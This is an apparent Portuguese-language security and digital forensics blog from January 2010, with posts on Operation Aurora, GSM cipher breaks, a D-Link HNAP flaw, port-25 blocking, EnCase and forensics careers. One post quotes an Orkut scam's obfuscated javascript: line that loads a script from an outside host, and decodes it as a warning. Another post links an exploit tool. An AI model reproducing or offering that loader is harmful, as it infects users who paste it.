Saiba mais sobre o caso:
EUA pedem explicações à China pelo ciberataque ao Google
Espionagem está no centro da disputa entre Google e China
Google ameaça sair da China após ataque

Ataques contra o Google exploraram falha desconhecida no Internet Explorer

Os ataques contra o Google, na China, exploraram uma falha até agora desconhecida no Internet Explorer. O ponto fraco no navegador mais utilizado no mundo foi identificado pela empresa de segurança na computação McAfee, e posteriormente confirmado pela Microsoft.

O Google anunciou na terça-feira que detectou, em dezembro, um ataque originado na China à sua infraestrutura empresarial, resultando em roubo de propriedade intelectual. A empresa veio a descobrir que mais de 20 outras companhias presentes no país também sofreram infiltrações.

A McAfee informou na quinta-feira que os responsáveis pelos ataques enganaram funcionários das empresas, fazendo-os clicar em links que direcionavam para um site que instalou secretamente um programa de espionagem em seus computadores, em uma campanha a que os hackers aparentemente designaram "Operação Aurora".

Wednesday, January 13, 2010

Google pode abandonar operações na China

A gigante das buscas online Google ameaçou encerrar suas operações na China - fechando a filial local e tirando do ar o serviço de busca - após sofrer um ataque em seus servidores. Recentemente a empresa teve contas de Gmail atacadas, contas estas utilizadas por ativistas de direitos humanos, e outras 20 empresas de setores diversos como alvos principais.

Devido à intensidade e ao alto nível de tecnologia empregados no ataque, alguns analistas acreditam que o ataque tenha partido do próprio governo. A decisão do Google, apesar de não explicitar a acusação, é baseada em evidência suficientemente concreta, afirma o Times.




fonte: http://www.nytimes.com/2010/01/13/world/asia/13beijing.html?hp

Tuesday, January 12, 2010

Falhas de segurança em redes 3G / GSM

Pessoal, acabei de ler o texto "A Second GSM Cipher Falls" no site do threat post (http://threatpost.com/en_us/blogs/second-gsm-cipher-falls-011110), agora foi a vez do A5/3, utilizado nas redes 3G, quebrado com a técnica de related-key attack.

No final do ano passado foi anunciado que o protocolo A5/1 foi quebrado utilizando técnicas de rainbow tabbles (http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1377827,00.html)

Conversas ao celular estão cada vez menos confienciais.....


Falha de segurança reportada no Milestone

Foi divulgado pelo pessoal do TechCrunch uma falha de segurança no badalado smartphone Milestone, da Motorola (http://www.motorola.com/Consumers/BR-PT/Consumer-Product-Services/Mobile-Phones/ci.Motorola-MILESTONE-BR-PT.vertical) que é, ao mesmo tempo, interessante e grotesca: você pode burlar a tela de bloqueio de segurança simplesmente pressionando a tecla dedicada para a função Voltar.


Segundo informações do site TechCrunch:

Exploiting the bug is fairly simple: while receiving an incoming call on a Droid that has its Lock screen activated, you can simply hit the dedicated ‘Back’ button to bypass the lock and jump to the homescreen. This, of course, gives access to the owner’s Email account, cookied web pages, phone directory, and everything else stored on the phone. You can take a tiny bit of solace in the fact that the thief would have to know your phone number or wait for someone to call your phone to exploit the bug, but that’s not particularly reassuring. The issue was first reported earlier today by The Assurer, which says that it is apparently only affecting Android version 2.0.1 on the Droid (which already represents a large chunk of Android’s userbase).

iptables -A OUTPUT -p tcp -d 0/0 --dport 25 -m state --state ESTABLISHED -j REJECT


A recomendação feita pelo Comitê Gestor da Internet (CGI.br) para bloqueio da porta 25 do protocolo TCP, usada para envio de e-mails, começa a ser seguida de forma mais ativa pelos provedores de acesso no Brasil.

Desde terça-feira (5/1), o UOL tem bloqueado o envio de e-mails por essa porta de comunicação, que é considerada um dos principais meios de propagação do spam. No seu lugar, os usuários foram instruídos a adotar a porta 587, que é uma das que exigem autenticação. A porta 587 tem sido oferecida pelo UOL desde 2004.

A medida atinge quem costuma enviar e-mails com ajuda de programas de mensagens, como Outlook, Thunderbird ou IncrediMail. Para continuar a enviar e-mails, essas pessoas terão de alterar a configuração dos programas, seguindo as recomendações do provedor. Usuários de webmail não são afetados.

Num dos e-mails enviados aos assinantes nas últimas semanas, o provedor forneceu as instruções para reconfigurações de SMTP e POP, justificando que “a mudança nas configurações tem por objetivo aprimorar o combate a spams, conforme acordo do UOL com o Comitê Gestor da Internet”.

Respaldo internacional
A medida não é nova e foi recomendada oficialmente pelo CGI.br há oito meses, em 24/4, que se apoiou em decisões anteriores de outros organismos internacionais ligados ou não à gestão da internet, como a Organização para Cooperação e Desenvolvimento Econômico (OCDE). Mas nem todos os provedores a seguem.

Na justificativa para a recomendação, o CGI.br considerou “o crescente abuso de computadores de usuários finais, possivelmente infectados ou mal configurados”, que seriam utilizados para enviar spam e espalhar códigos maliciosos por e-mail.

No aviso aos usuários, o gerente de segurança do UOL, Nelson Novaes, argumenta que “será mais difícil para que computadores zumbis sejam utilizados para o envio de spam”. Zumbi é o nome dado a PCs infectados por programas maliciosos, que permitem o controle da máquina por terceiros.

Além de não ser novidade, a medida já é utilizada por muitos provedores no exterior. O Google, que permite a leitura de seu serviço gratuito Gmail por programas de e-mail, trocou a porta 25 pela 465 e 587. O Yahoo Mail também utiliza a porta autenticada 587.
Servidor pessoal
Mas o bloqueio da porta 25 pode prejudicar quem utiliza servidores pessoais de e-mail em seu próprio PC - ou por razões de segurança, para evitar que terceiros bisbilhotem o conteúdo das mensagens, ou por quem, mesmo não sendo spammer, costuma enviar e-mails a muitos destinatários, como escolas, associações e pequenas empresas.
O sistema de correio eletrônico da internet usa geralmente três componentes: um programa de envio (Mail User Agent), um servidor de transferência de mensagens (Mail Transfer Agent) e um programa de entrega (Mail Delivery Agent).


Para a maioria dos usuários, basta um programa de envio. Tecnicamente, qualquer PC ligado a internet pode  atuar também como parte da rede servidores de transferência. No entanto, os servidores de transferência só operam entre si pela porta 25. Ao bloquear essa porta, os provedores reservam para si a tarefa de enviar sua mensagem para outro servidor da internet, impedindo que o PC do usuário a envie diretamente.

No Brasil, a recomendação já era seguida por alguns provedores. O Terra, controlado pela Telefônica, afirmou em comunicado adotar “todas as medidas técnicas recomendadas pelo CGI”, incluindo a autenticação de mensagens via porta 587.

Por sua vez, a TVA, que administra o serviço de banda larga Ajato, declarou por meio de sua assessoria que não bloqueia a porta 25, e que está aguardando a definição de uma data, pelo CGI, para sua implantação.
Spam, o culpado
A principal razão para o bloqueio, segundo o CGI.br, é o combate a spam. “Temos um número muito grande e crescente de máquinas de usuários finais, conectadas via banda larga, mas sem proteção”, afirmou em dezembro a gerente geral do CERT.br, Christine Hoepers, em artigo publicado no site do CGI.br.

Entre as fontes que indicam o Brasil como usado para envio de spam, e que foram listadas pelo CGI.br, estão as listas da Composite Blocking List (CBL). Na quinta-feira (7/1), o Brasil estava em segundo lugar na lista, com 12,28% de domínios que foram flagrados enviando spam (por PCs ou mal configurados, ou vulneráveis por código malicioso). Nesse ranking, o país ficou atrás apenas da Índia, com 15%.
A empresa de harware para redes Cisco chegou a afirmar, em relatório, que o Brasil era líder mundial de spam. Mas o relatório, que avaliou em 7,7% a participação do país no envio das mensagens, baseou sua contagem apenas no país de instalação dos servidores que deram origem ao envio, e não nos reais remetentes, que podem ter disparado o envio de outro país.
Economia de banda
O diretor do CGI.br, Demi Getschko, vê de modo bastante positivo a iniciativa do UOL. “O bloqueio da porta 25 é bom tanto para o usuário como para o provedor, que para de gastar banda à toa com uso pirata”, defende.

No entanto, o diretor esclarece que não há uma ação coordenada de provedores para o bloqueio da porta, nem haverá uma data limite para sua adoção.

 “Fizemos cinco ou seis reuniões, com representantes do CERT e de muitos provedores, inclusive o UOL e a Abranet (Associação Brasileira de Internet), até chegar ao texto final da resolução que dá a recomendação aos provedores. Torcemos para que eles adotem a recomendação o mais rapidamente possível, mas o CGI não tem poder para obrigar a fazer. Nosso papel é o de sugerir boas práticas”, esclarece Getschko.

 “Em vez da porta 25, o que recomendamos é que o provedor adote uma porta com autenticação. Isso vai dar mais trabalho para o spammer, pois ele terá primeiro que descobrir que portas determinado provedor usa, e depois que senha é utilizada para autenticação”, completa o diretor.


Usando FLASM para burlar a autenticação por flash

O utilitário FLASM (disponível em http://flasm.sourceforge.net/) é um aplicativo de linha de comando para assembler/disassembler de ActionScript (programação utilizada em Flash). Com este utilitário é possível realizar alterações em qualquer arquivo SWF. Este utilitário suporta arquivos produzidos pelo Flash 8 e versões mais recentes do Flash.

Este vídeo demonstra como fazer um disassemble no arquivo SWF utilizando o Flasm. Neste exemplo, o desenvolvedor agregou as credencias no ActionScript para executar a autenticação diretamente.






fonte: http://www.securitytube.net/Bypassing-Flash-Logins-using-Flasm-video.aspx

Falha na autenticação HNAP em equipamentos DLINK

Há alguns dias atrás (10/01), o pessoal do SourceSec Security Research publicou um documento (disponível em http://www.sourcesec.com/Lab/dlink_hnap_captcha.pdf) detalhando uma falha que afeta vários roteadores D-Link (muito utilizados hoje em dia em residências e pequenas empresas, para acesso a banda larga) que permite que usuários não autenticados ou usuários sem privilégios administrativos possam visualizar e editar as configurações do roteador.

Para obter o acesso ao equipamento, o pessoal do SourceSec Security Research utilizou o protocolo HNAP para acessar o roteador.

O HNAP (Home Network Administration Protocol) é um protocolo desenvolvido pela CISCO, (http://www.cisco.com/web/partners/downloads/guest/hnap_protocol_whitepaper.pdf) baseado em  SOAP, com o objetivo de permitir integração entre os diversos periféricos (câmeras, impressoras, sistemas de armazenamento, media players...) para prover a idéia de casa inteligente.





É uma vulnerabilidade crítica, uma vez que pode ser explorada dentro da rede (LAN) ou também externamente (WAN) e, inclusive os equipamentos mais recentes, que incluem um CAPTCHA na tela de login via browser, podem ser atacados utilizando o HNAP.



A suspeita, não comprovada ainda, é que todos os equipamentos fabricados a partir de 2006, por incluírem suporte a HNAP, são vulneráveis a este tipo de ataque.

Já há inclusive uma ferramenta para explorar esta vulnerabilidade, disponível em http://www.sourcesec.com/Lab/hnap0wn.tar.gz.

[UPDATE 15/01]

A D-Link informou que os modelos afetados são o DIR-855 (versão A2), DIR-655 (versões A1 a A4) e DIR-635 (versão B). Três modelos descontinuados - DIR-615 (versões B1, B2 e B3), DIR-635 (versão A) e DI-634M (versão B1) - também são afetados. A empresa informa que novas atualizações de software têm sido oferecidas em seus sites na web. Dos modelos afetados, três - DIR-615, DIR-635 e DIR-655 - são vendidos pelo canal formal da D-Link no Brasil.

A subsidiária brasileira da empresa informou, por meio de sua assessoria de comunicação, que aguarda orientação da matriz para a publicação, no site local, da correção para a falha.

Maiores informações: http://pcworld.uol.com.br/noticias/2010/01/15/falha-em-roteadores-d-link-pode-abrir-tela-de-configuracao-a-invasores/

Aplicativo para Android é eliminado por suspeita de golpe online


Após alertas de bancos, Goole retira widget suspeito, além de como outros 50 aplicativos similares inseridos pelo desenvolvedor '09Droid'.

Aplicativos móveis que poderiam ter roubado dados bancários de usuários começaram a aparecer na loja de aplicativos Android Market, para o sistema operacional móvel do Google, alertaram especialistas em segurança na segunda-feira (1/1).
O banco canadense BayPort Credit Union, fez um alerta em 22 de dezembro sobre um aplicativo para o sistema Android que prometia facilitar o acesso dos correntistas ao banco online. “Acredita-se que os golpistas tenham desenvolvido aplicações móveis fraudulentas para o Android Marketplace, usando uma técnica de phishing na tentativa de ganhar informações de acesso dos usuários de mobile banking” alerta o banco.

No mesmo dia do BayPort Credit Union, o banco norte-americano First Tech Credit Union, que possui agências nos Estados do Oregon e de Washington, envio um comunicado similar sobre aplicativos suspeitos.

O banco BayPort informou ter notificado o Google no dia 15 de dezembro, uma semana antes de fazer seu alerta, e que a empresa removeu não somente o aplicativo suspeito como outros 50 aplicativos similares inseridos pelo mesmo desenvolvedor, registrado como “09Droid.”

Pesquisadores de segurança não confirmaram que as aplicações bancárias presentes no Android Marketplace eram, de fato, maliciosas. O chefe de pesquisas da empresa de segurança de dados, F-Secure, Mikko Hypponen, disse que está buscando uma cópia dos aplicativos para testes já que o Google retirou as aplicações do Marketplace. Segundo ele, "é possível que as aplicações não tenham nada de malicioso diretamente."

Hypponen acredita que o desenvolvedor "09Droid" tenha simplesmente tentado ganhar dinheiro facilmente ao oferecer diversas versões de aplicativos, que apenas funcionam como atalhos para serviços de internet banking, cobrando 99 centavos de dólar por cada um.

O especialista da F-Secure ainda observa que o Android não é uma plataforma tão popular para servir como base de um golpe online envolvendo diversos bancos.  Em dezembro de 2009, o Android registrou uma participação de 0,02% no mercado de sistemas operacionais, segundo a NetApplications.


Friday, January 8, 2010

Windows 7 "GodMode"

Muito se tem falado a respeito de um feature escondido no Windows 7, chamado GodMode. A minha primeira idéia era que o GodMode era uma espécie de super usuário ou coisa do tipo, mas na verdade este é um recurso que permite ao usuário acessar todos os paineis de controle do sistema operacional a partir de uma simples pasta:



Com a criação de um novo diretório no Windows 7 e renomeando este diretório com uma string determinada, o usuário do sistema acessa, a partir de um único local, várias configurações, desde alterar o visual do ponteiro do mouse até criar uma nova partição no disco rígido.

Para habilitar o "GodMode," basta criar um novo diretório e então renomeá-lo para:


    GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

Uma vez feito isso, o ícone do diretório será substituído pelo ícone do Painel de Controle e ganhará dezenas de opções de configuração do Windows.

Definitivamente, é uma mão na roda para quem gosta de brincar nas configurações do Windows!



maiores informações: http://news.cnet.com/8301-13860_3-10423985-56.html?tag=twitter2




UPDATE: Questionada sobre o assunto, a Microsoft alega que este é apenas um dos inúmeros recursos não documentados do novo sistema operacional. Assim como se habilita o GodMode, estes outros recursos escondidos são habilitados com a criação de um diretório com um nome qualquer seguido por uma string, por exemplo: BrazilForensic.{4026492F-2F69-46B8-B9BF-5654FC07E423}

maiores informações: http://news.cnet.com/8301-13860_3-10426627-56.html


Abraços a todos!

Thursday, January 7, 2010

Redes sociais e engenharia social... tudo haver...

Recentemente recebi uma mensagem no Orkut dizendo: clique no link para ganhar moedas verdes... Minha primeira questão foi: what a hell são moedas verdes? Com uma consultoria da minha esposa, descobri que há um jogo no Orkut chamado Colheita Feliz, onde as moedas verdes são necessárias para avançar os níveis e adquirir novos itens para melhorar no jogo...


Aproveitando da inocência dos desavisados usuários do Orkut, e a ganância descarada dos usuários destes aplicativos, os oportunistas criminosos virtuais encontraram uma forma bem criativa para difundir malwares e outras pragas..

Bom, a questão é que o link era diferente do JavaScript utilizado nos primórdios do Orkut para abrir as fotos dos álbuns travados. A mensagem é a seguinte:


TUTORIAL COLHEITA FELIZ, PEGUE O TANTO DE MOEDAS QUE QUISER

1) Primeiro, Copie o codigo abaixo que esta escrito emVERDE.


Codigo:



javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild(c);c.src=%22ht%22+%22tp%22+%22://co%22+%22nvi%22+%22tes%22+%22aq%22+%22ui.%22+%22co%22+%22m/Moedas/%22;void(0)






2) Cole o codigo na barra de NAVEGACAO ( onde escreve WWW) e de ENTER.





3) Ira aparecer uma Janelinha pedindo pra voce escolher a Quantidade de moedas, escolha e de OK





4) Agora aguarde 5 minutinhos, quando terminar aparecera uma mensagem avisando voce.





5) Pronto, agora e so desfrutar de suas MOEDAS VERDES





Quem gostou da um Up por favor ^^


Uma olhada no link e um conhecimento mínimo de ASCII para saber que o código %22 nada mais são que aspas duplas ( " ), então a URL %22ht%22+%22tp%22+%22://co%22+%22nvi%22+%22tes%22+%22aq%22+%22ui.%22+%22co%22+%22m/Moedas/%22, com as aspas concatenadas se transforma em http://convitesaqui.com/Moedas/,

Uma pesquisa no Google revela que este é um "virus" (???) já conhecido: http://info.abril.com.br/noticias/blogs/firewall/seguranca/tome-cuidado-com-a-moeda-verde-no-orkut/


No site HackerNews há um excelente texto sobre o tema (http://www.hackernews.com.br/?p=121), recomendo a leitura para quem procura mais informações sobre este "vírus do orkut"....


Abraços!

A ferramenta EnCase

A ferramenta forense EnCase é um sistema integrado de análise forense baseado no ambiente Windows. Ele é muito utilizado por profissionais da segurança de computadores, policiais e orgãos do governo em todo o mundo. O processo utilizado pelo EnCase começa, basicamente, com a aquisição das imagens dos discos rígidos relacionados ao caso investigado. Depois da criação das imagens, chamadas de Evidence Files, pode-se adicioná-las a um único caso e conduzir a análise em todas elas simultaneamente.

É muito importante observar que o EnCase não opera na mídia original ou discos espelhados, ele monta os Evidence Files como discos virtuais protegidos contra escritas. Então, o EnCase reconstrói o sistema de arquivos contido em cada Evidence File, permitindo ao investigador visualizar, ordenar e analisar os dados, através de uma interface gráfica. Esta proteção contra escrita é muito importante, uma vez que é obrigação do investigador garantir que não haverá quaisquer alterações nos dados analisados.

Mesmo sabendo que o uso de uma ferramenta não substitui o conhecimento científico, a cada dia surgem ferramentas que permitem ao examinador a otimização de seu trabalho e, segundo o fabricante do EnCase, o uso desta ferramenta ajuda a reduzir o tempo de investigação em até 65%.

Nos EUA, o EnCase é largamente usado por agências governamentais, polícia, fisco, e em investigações militares e corporativas.

Embora o uso de ferramentas como o EnCase auxilie o examinador na coleta e análise dos dados, o conhecimento científico e tecnológico é fator primordial para o sucesso da tarefa.

O EnCase está hoje na versão 6.15 e já se fala da versão 7.0 ainda no primeiro semestre deste ano.

Forense Digital - ferramentas e metodologias

Ok.... Já sabemos o que faz um perito de computação forense. Agora nos resta descobrir como ele faz. Para explicar o "como", Raffael Vargas escreve dois excelentes artigos para sua coluna no iMasters, disponíveis pelos links http://imasters.uol.com.br/artigo/6485/forense/pericia_forense_computacional_ferramentas_periciais/
e http://imasters.uol.com.br/artigo/6225/forense/pericia_forense_computacional_e_metodologias_para_obtencao_de_evidenvias/ e alguns trechos que eu tomo a liberdade de transpor neste blog:

 Mas para trabalhar com forense computacional é bom ter, não somente, uma visão superficial e sim uma visão mais profunda das armas reais e das armas hipotéticas possíveis, permitindo supor o que pode ter acontecido, estar acontecendo ou vir a acontecer. Pode-se ter um melhor entendimento do poder do agressor se puder comparar e entender o que ele fez com uma determinada arma e o que ele poderia ter feito, principalmente se for necessário saber como ele age, como pode agir, como ele é, quem ele é, onde ele está e, mais ainda, como pegá-lo.

enCase: padronização de laudos, recuperação de dados, banco de dados de evidências, analisa hardwares, analisa logs, permite a perícia das evidências sem alterá-las, dentre outras funcionalidades.  


A ferramenta EnCase é uma das ferramentas mais completas no que se refere a perícia forense, pois além de auxiliar recuperação de arquivos deletados, padroniza laudos periciais, organiza um Banco de Dados com as evidências, faz o encryption (fornece senhas) e o decryption (quebra as senhas) dos arquivos, analisa hardwares, analisa logs, analisa formatos e tipos de e-mails e fornece uma opção de se manusear a evidência sem danificá-la, além de outras características mais avançadas.

Na Figura abaixo, foi feita uma verificação na caixa de entrada de e-mail de um suposto infrator, utilizando métodos de busca e investigação da ferramenta EnCase em e-mails e Internet.


Interface do EnCase E-mail e Internet


Exemplo: foi recebido por uma suposta vítima um e-mail chantageandoa. Após ter sido verificada através de outras ferramentas a localização do infrator, houve uma apreensão do maquinário, mas o infrator formatou sua máquina e instalou um novo sistema operacional e novas aplicações. Nesta situação, a ferramenta pode auxiliar o perito na busca de dados nos setores não utilizados (apagados) do HD e logo após fazer uma busca em todos os e-mails enviados a esta suposta vítima, mesmo o HD tendo sido formatado, podendo com esta ferramenta recuperar os e-mails, que também foram formatados.

Falarei mais sobre a ferramenta EnCase e algumas dicas para certificação EnCE neste blog futuramente.

Obrigado!

Como se tornar um profissional de Forense Digital?

Atualmente trabalho com grandes nomes do cenário de computação forense no Brasil. Um destes nomes é Raffael Vargas, consultor forense da TechBiz Forense Digital.

Vargas escreve um ótimo texto sobre Como se tornar um profissional de Forense Digital na sua coluna do iMasters, o qual eu tomo a liberdade de transcrever neste blog:


"Esta é uma das perguntas que mais recebo ultimamente. Pensei em escrever este artigo logo após receber um email, solicitando como, onde e em quanto tempo uma pessoa se torna um Profissional de Forense Digital.
Posso neste artigo lhe mostrar o caminho das pedras, mas quem terá de andar até elas é você. Como naquela pequena parábola "Deus manda a chuva, mas nós temos de plantar", então vamos estudar, estudar e estudar.
Primeiramente para iniciar em alguma atividade Forense, seja ela em qualquer ramo, temos de entender o que seria forense. Não vou relatar como a forense iniciou, quem a criou ou como é foi desenvolvida. Pretendo, sim, apresentar como nos tornamos profissionais em Forense Digital, este outro tópico pode ser encontrado nos demais artigos escritos.
É preciso buscar este entendimento do que seria Forense Digital em um curso de nivelamento no ramo. Existem várias empresas e vários cursos sobre Forense Digital ou Forense Computacional, pois são as mesmas coisas, mas procure saber primeiro a idoneidade da instituição, quem irá ministrar o curso, qual sua importância e influência no mercado, pois nem tudo que reluz é ouro.
Não podemos esquecer que todos os cursos necessitam de uma experiência em Informática Básica, Infra Estrutura e o Básico em Sistemas de Arquivos, então o aluno tem que ter realizado uma Faculdade ou um Técnico em Informática, pois aprender "do nada" é muito difícil.
O pessoal que queira ingressar no ramo da Forense Digital tem de ter um entendimento amplo em Segurança da Informação e Infraestrutura de Redes de computadores, pois normalmente necessitam de entendimento de padrões e Leis de conformidade, que são utilizadas nos setores de segurança da Informação, além das investigações serem realizadas em evidências vivas (em Rede) ou posmorten (disco rígido).
Após este contato inicial com o mundo Forense Digital, tente realizar atividades que possam agregar valores ao seu aprendizado, que serão utilizadas no futuro de um profissional em Forense Digital, como:
  1. Cópias Forenses de Discos Rígidos. Esta é uma atividade que pode ser realizada em casa, com aplicações free, para fins de estudo;
  2. Estudo de metodologias de Forense Digital, como Aquisição, Preservação, Análise e outros;
  3. Busca de conhecimento em ferramentas Forenses. Existem várias ferramentas, então foque em um tema, como por exemplo  a Esteganografia, e busque o conhecimento nesta ferramenta;
  4. Leitura de Material em Forense Digital, pois ler é uma das atividades que mais são realizadas nesta área;
  5. Leitura de material de Direito Digital é uma atividade importantíssima, pois para um perito ou investigador privado, é necessário ter entendimento do que se pode ou não realizar e como apresentar os dados.
Estes pontos são pontos para serem estudados e entendidos ao longo do tempo, pois aprender é sempre bom e o dia todo estamos aprendendo algo. Inseri um item somente para a Leitura de Material de Direito Digital, pois é uma área que é nova no mercado e existem poucos profissionais, porém muito competentes, que realizam estas atividades. Então estudo muito esta área.
Depois de entender o mundo Forense Digital, vamos para as certificações. Hoje, no mercado brasileiro, existem algumas certificações que são respeitados no mundo inteiro. Quase todas as certificações são relativas a ferramentas ou a fabricantes, mas existem várias que são aceitas no mercado nacional.
As certificações mais válidas no mercado mundial em softwares:
  • EnCE (EnCase Certified Examiner), do fabricante Guidance;
  • ACE (AccessData Certified Examiner), do fabricante AccessData;
Logo após, temos certificações referentes a cursos, no Brasil e fora do país, como:
  • CCFT (Certified Computer Forensic Technical);
  • GIAC (Global Information Assurance Certification), da SANS, neste há vários cursos em Forense Digital;
  • CEH (Certified Ethical Hacker), estudo profundo;
  • CHFI (Certified Hacker Forensic Investigator);
  • ACFEI (American College of Forensic Examiners Institute) é uma instituição de Forense, com várias áreas de atividade.
Com algumas destas certificações você já está apto a trabalhar como um Profissional em Forense Digital, pois lhe darão suporte em conhecimento e visibilidade no mercado."


fonte: http://imasters.uol.com.br/artigo/12212

Mercado de computação forense tende a crescer

por Vitor Cavalcanti*
30/07/2009

Embora governo seja hoje principal comprador, corporações começam a investir na área

O número de projetos de computação forense no Brasil está em crescimento. Só a TechBiz Forense, que fornece hardware e software neste segmento, contabiliza diversos cases e não apenas em governo. Redecard e Rede Globo, por exemplo, são clientes da empresa. Essas companhias compraram software que permite avaliar máquinas via rede, sem causar prejuízos aos usuários enquanto trabalham.
"A empresa não trata crime, mas da violação da política de segurança e fraude, o que se deve investigar da mesma forma. Tem empresas com rede de mais de 100 mil computadores", dispara o diretor-comercial da TechBiz Forense, Giovani Thibau.
A Redecard, além do software EnCase, que tem autonomia para conduzir investigações complexas, possui também um duplicador de HD por fazer trabalho em campo, como detalhou Marcelo de Barros Alves, diretor de operações da TechBiz. Já a Rede Globo, utiliza o software para análise de dados. "Isso passa a ser usado para identificação, por exemplo, de invasões. O que houve depois da invasão? Quem fez? De onde partiu?", exemplifica.
O executivo informou em entrevista, concedida durante a inauguração do laboratório de computação forense do Instituto de Criminalística Carlos Éboli (ICCE), no Rio de Janeiro, que as ferramentas fornecidas para polícia e empresas têm algumas diferenças, mas produzem os mesmos resultados. O que muda, por exemplo, é o fato de as empresas usarem o software EnCase via rede.
Thibau vê crescimento na demanda por esse tipo de produto, mas, mesmo apontando que bancos, prestadoras de serviços e outras indústrias, como telecom, demonstrem interesse pela área, reconhece que órgãos governamentais ainda são os principais clientes. A companhia possui projetos, já executados, entre outros, com as polícias de São Paulo, Rio de Janeiro, Minas Gerais e Paraná e Polícia Federal.
*O repórter viajou ao Rio de Janeiro a convite da TechBiz Forense.


fonte: http://www.itweb.com.br/noticias/index.asp?cod=59583